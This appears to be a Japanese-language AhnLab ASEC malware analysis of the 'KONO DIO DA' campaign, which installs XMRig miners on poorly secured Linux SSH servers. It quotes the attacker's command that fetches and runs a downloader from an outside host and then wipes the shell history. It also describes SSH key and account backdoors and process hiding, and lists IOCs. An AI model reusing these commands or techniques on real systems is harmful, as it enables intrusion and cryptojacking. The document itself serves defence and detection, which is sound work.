AhnLab Security Emergency response Center(ASEC)では最近、不適切に管理されている Linux SSH サーバーを対象に XMRig コインマイナーがインストールされていることを確認した。攻撃は最低でも2022年頃から行われていることが確認され、XMRig をインストールする時に SHC(SHell script Compiler)で開発されたマルウェアが使用されるという点と、SSH バックドアアカウントを登録するという点が特徴である。
不適切に管理されている Linux SSH サーバーを対象とする攻撃事例を見ると、DDoS Bot やコインマイナーマルウェアをインストールする事例が大半を占めている。DDoS Bot の場合、過去の ASEC ブログで ShellBot [1]、ChinaZ DDoS Bot [2]マルウェアをインストールする攻撃事例を紹介したことがある。XMRig コインマイナーをインストールする攻撃事例は SHC マルウェアと[3]一緒に紹介したことがある。
このブログではコインマイナーをインストールする様々な攻撃事例のうち一つを扱うが、相対的に最近始まった攻撃だという点と SHC を使用する点、そして攻撃者が直接「KONO DIO DA」というメッセージを作成した点が特徴として挙げられる。
1. Linux SSH サーバーを対象とする辞書攻撃
Linux サーバーのようなサーバー環境を対象とする攻撃ベクトルとしては、不適切に管理されているサービスが代表的である。Secure Shell(SSH)サービスは大半の Linux サーバー環境にインストールされており、簡単に攻撃に使用でき、かつ不適切に管理されやすいサービスである。SSH は管理者がリモートでログインしてシステムを操作できるようにするが、このためにはシステムに登録されているユーザーアカウントにログインする必要がある。
もし Linux システムに単純な形態のアカウント情報、すなわち ID / PW が使用されている場合、攻撃者は総当たり攻撃や辞書攻撃を通じてそのシステムにログインし、悪意のあるコマンドを実行することができる。実際に不適切に管理されている Linux SSH サーバーを対象とする攻撃において主に使用される方法は、ポートスキャンを通じて外部に公開された SSH サーバーを探し、既知のアカウント情報を利用することで辞書攻撃を実行してログインした後、マルウェアをダウンロードしてインストールするという方法である。
以下は「KONO DIO DA」攻撃を実行した攻撃者のアドレスと、攻撃に使用された様々な ID / PW リストの一部である。
| ID | PW | 攻撃アドレス |
|---|---|---|
| root | . | 23.224.232[.]68 |
| root | … | 23.224.232[.]68 |
| root | P@ssw0rd | 23.224.232[.]68 |
| admin | password1! | 23.224.232[.]68 |
| web | 123456 | 23.224.232[.]68 |
| tomcat | tomcat | 23.224.232[.]68 |
| centos | Huawei@123 | 23.224.232[.]68 |
| oracle | Huawei@123 | 23.224.232[.]68 |
2. KONO DIO DA 攻撃事例 – 最新
ログインに成功した攻撃者は以下のようなコマンドを利用してマルウェアをダウンロードし、実行していた。「uname -a」、「nproc」コマンドはシステム情報を出力するコマンドで、どのようなシステムにコインマイナーがインストールされたかを、攻撃者がのちに確認するためのものと推定される。それ以外にも、マルウェアの実行後にこのコマンドが実行された history を削除するコマンドも存在する。
# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; chmod +x am ; ./am ; history -c ; rm -rf ~/.bash_history
ダウンロードされたファイルである「am」は SHC で開発されたマルウェアで、ダウンローダー機能を担っている。SHC で開発されたということは、実際のマルウェアの原本が Bash スクリプトであり、これを ELF フォーマットに変更したということを意味する。SHC に関する詳細情報は以下の過去ブログで紹介している。
「am」は「nw」をダウンロードして実行する単純な形態のダウンローダーであり、「nw」も最終的には追加のマルウェアをダウンロードして実行するダウンローダーマルウェアである。「nw」Bash スクリプトを実行すると、過去の攻撃に使用された自身のコインマイナーマルウェアと他のマルウェアを強制終了してアンインストールし、XMRig および Bash スクリプトマルウェアが含まれた圧縮ファイルをダウンロードして実行する。
圧縮ファイルには XMRig である「dbus-daemon –system –address=systemd_ –nofork –nopidfile –systemd-activation –syslog-only」と設定ファイルである「config.json」の他にも3つの Bash スクリプトマルウェアが含まれている。
「nw」は圧縮ファイル内の「start」Bash スクリプトを実行し、「start」は実質的に「admin」Bash スクリプトを実行する機能を担っている。「admin」は「root.sh」Bash スクリプトと「root.sh」を1分ごとに実行させる cron タスクの登録する役割を担っている。
「root.sh」は同じパスに存在する XMRig の「dbus-daemon –system –address=systemd_ –nofork –nopidfile –systemd-activation –syslog-only」を実行し、マイニングに必要な設定情報は同じパスにある「config.json」を読み込んで使用する。XMRig は正常なプロセスである「dbus-daemon」に偽装した名前で実行されるが、プロセスの名前だけでなく実行時の引数も一緒に偽装するため、一般のユーザーはコインマイナーが実行中であるかを認知することが難しい。
| Mining Pool | Wallet | Password |
|---|---|---|
| xmr.doi-2020[.]net:14444 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ.worker01/bolus.eu@gmail.com | worker01 |
| val.doi-2020[.]net:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
| 142.202.242[.]45:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
| pool.hashvault[.]pro:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
| AS.doi-2020[.]net:80 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ | x |
| 139.99.123[.]196:80 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ | x |
| pool.supportxmr[.]com:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
3. KONO DIO DA 攻撃事例 – 過去
過去の事例を見ると、最近の攻撃に使用されているマルウェアよりも、さらに多様な機能を提供することが確認できる。初回インストールファイルは確認されていないが、「nw」と同じ機能を担う Bash スクリプトは「hoze」である。「hoze」はダウンロードした圧縮ファイルを解凍した後、「init0」という名前の ELF ファイルを実行するが、「init0」は XMRig コインマイナーをインストールする機能以外にも、様々な追加機能を提供するマルウェアである。
最近確認されている攻撃とは違い、「KONO DIO DA」攻撃者は過去に行われた攻撃よりもさらに多様な手法を使用している。代表的には持続性維持の手法がある。圧縮ファイルを確認すると「key」ファイルが存在する。
「key」ファイルには以下のように SSH 公開鍵が含まれている。「init0」は元から存在する「~/.ssh/authorized_keys」ファイルを削除し、圧縮ファイル内に存在する「key」をこのパスにコピーする。
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9XdfgaarEOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key |
SSH リモートサーバーにログインする方法には、ID / PW を入力する方法以外にも、公開鍵 / 秘密鍵を生成して ID / PW を入力せずにログインする方法がある。これにより、ユーザーは SSH 公開鍵 / 秘密鍵を生成した後、接続対象サーバーに公開鍵を登録すると、クライアントで秘密鍵を利用して接続できる。攻撃者は公開鍵である「key」ファイルを「~/.ssh/authorized_keys」パスに生成して登録することで、それ以降も自身の秘密鍵を利用して感染システムにログインできる。
この他にも usermod コマンドを利用して「cheeki」というアカウントを追加し、感染システムに「root」、「dolphinscheduler」、「admin」、「es」、「hadoop」アカウントが存在する場合には、攻撃者が指定したパスワードに変更する。このプロセスは、感染システムにバックドアアカウントを生成し、その後も攻撃者がログインできるようにする持続性維持の手法である。
「uninstall.sh」Bash スクリプトはセキュリティサービスである Alibaba Cloud の Ali cloud shield (Ann Knight) サービスをアンインストールする機能を担っている。Aegis をアンインストールする機能を持つマルウェアには代表的なものに Kinsing がある。Kinsing は Aegis の他にも Tencent QCloud Monitor をアンインストールし、SELinux、AppArmor を無効化する機能を担当する Bash スクリプトをインストールする。
「init.sh」は名前とは違って SHC ELF ファイルであり、以下のような単純な形態である。マイナーを実行させる機能とマイナープロセスを隠蔽する機能を担っている。このため「/var/tmp/…」ディレクトリを生成し、mount コマンドでマイナープロセスの PID に対する /proc ファイルシステムにバインド(bind)する。このような方式は以前から知られているプロセス隠蔽方式の一つであり、攻撃者はルートキットの代わりにこのような単純なコマンドでコインマイナープロセスを隠蔽している。
上記で取り扱ったスクリプトおよび SHC ELF ファイルは補助的な役割を実行し、実質的には「secure」が主な機能を担っている。「secure」は SHC でビルドされた ELF ファイルであり、XMRig コインマイナーを実行する機能以外にも、最新の XMRig をインストールし、自身を cron タスクに登録する振る舞いを担っている。すなわち、cron タスクを通じて定期的に実行され、XMRig が存在しない場合には最新バージョンをダウンロードし、感染システムで仮想通貨を採掘するのである。
不適切に管理されている Linux SSH サーバーを対象とする攻撃事例を見ると、DDoS Bot やコインマイナーマルウェアをインストールする事例が大半である。そしてコインマイナーマルウェアの攻撃事例を見ると、大半が特に変わった特徴はなく、モネロコインを採掘する XMRig をインストールする場合が多い。しかし「KONO DIO DA」攻撃者は、XMRig をインストールする機能以外にも様々な解析妨害手法と追加のマルウェアを一緒に使用しており、相対的に最近確認された攻撃であるという点が特徴と言える。
| Mining Pool | Wallet | Password |
|---|---|---|
| 5.9.157[.]2:10380 | TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C | x |
| 2.58.149[.]237:2007 | TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C | x |
4. 結論
不適切に管理されている Linux SSH サーバーを対象にコインマイナーマルウェアをインストールする攻撃は、以前から行われ続けている。ここで取り扱った「KONO DIO DA」攻撃キャンペーンは、XMRig コインマイナーマルウェアをインストールする以外にも SSH バックドアアカウントを登録し、持続性を維持している。コインマイナーがインストールされると、システムのサポートを利用して攻撃者のモネロコインを採掘することになる。また、攻撃者はその後も SSH バックドアアカウントでログインすることで、別のマルウェアをインストールしたり、システム内の情報を窃取するなどの様々な不正な振る舞いを実行できる。
そのため、管理者はアカウントのパスワードを推測が困難な形式で設定し、定期的にパスワードを変更することで、総当たり攻撃や辞書攻撃から Linux サーバーを保護しなければならず、セキュリティパッチを最新にして脆弱性攻撃を防止しなければならない。また、外部に開放されていてアクセスが可能なサーバーに関してはファイアウォールのようなセキュリティ製品を利用し、外部の攻撃者からのアクセスを統制しなければならない。最後に、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払わなければならない。
ファイル検知
– CoinMiner/Text.Config (2023.04.24.02)
– Downloader/Linux.Agent.1011056 (2023.04.24.02)
– Downloader/Linux.Agent.11344 (2023.04.24.02)
– Downloader/Shell.Agent.SC187868 (2023.04.24.02)
– Downloader/Shell.Agent.SC187872 (2023.04.24.02)
– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Trojan/Linux.Agent.1010416 (2023.04.24.02)
– Trojan/Linux.Hider.1008280 (2023.04.24.02)
– Trojan/Shell.Agent.SC187867 (2023.04.24.02)
– Trojan/Shell.Agent.SC187876 (2023.04.24.02)
– Trojan/Shell.Runner.SC187869 (2023.04.24.02)
– Trojan/Shell.Runner.SC187871 (2023.04.24.02)
IOC
MD5
– ea30afd4f65f8866bebcaf92168f3241 : 最新バージョンのダウンローダー (am)
– 1192697ed3d2302bec3ee828c154e300 : 最新バージョンのダウンローダー Bash スクリプト (nw)
– 1db93cb95e409769561efb66e4fd5c72 : Bash スクリプト (start)
– 6e9001516053770f6dd645954240bced : Bash スクリプト (admin)
– a978aec11a072855e2cfba593160886e : Bash スクリプト (root.sh)
– 4f1661d873cef8a3fa3ca34080816e87 : XMRig コインマイナー (dbus-daemon –system –address=systemd_ –nofork —nopidfile –systemd-activation –syslog-only)
– 20ac8a45d129e3ce3444494d9672692c : XMRig 設定ファイル (config.json)
– 5c1ad4a8335fc406040a070b2be661ff : 過去バージョンのダウンローダー Bash スクリプト (hoze)
– 90948ae9f7d167d4016c7a56477a67b3 : 過去バージョンのダウンローダー (init0)
– 1932d2e4081f6dd5c8b32d29b1ab5caf : Bash スクリプト (init.sh)
– e4cc1a7f992909e8509520fdd6c9a3f7 : Bash スクリプト (uninstall.sh)
– bb497b86c26893e10432781c6550e5fc : Bash スクリプト (secure)
– 254784ca05bdd3928d7889d0ea3195ab : XMRig コインマイナー (xri)
– 5f89f90efd1568618e72bb30b8e44fce : XMRig 設定ファイル (config.json)
– 5aa60757665510b2c8e9bb924c2b40ef : XMRig 設定ファイル (config32.json)
ダウンロードアドレス
– hxxp://46.41.150[.]129/.bo/am (辞書攻撃)
– hxxp://46.41.150[.]129/.bo/nw : 最新バージョンのダウンローダー (am)
– hxxp://46.41.150[.]129/.js/new-xmrig.tgz : 最新バージョンのダウンローダー (w)
– hxxp://2.58.149[.]237:6972/hoze : 過去バージョンのダウンローダー
– hxxp://2.58.149[.]237:6972/xri2.tar : 過去バージョンのコインマイナー (hoze)
– hxxp://141.95.19[.]91:8080/xri/xri : XMRig コインマイナーダウンロード
– hxxp://141.95.19[.]91:8080/xri/config.json : XMRig 設定ファイルダウンロード
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories: マルウェアの情報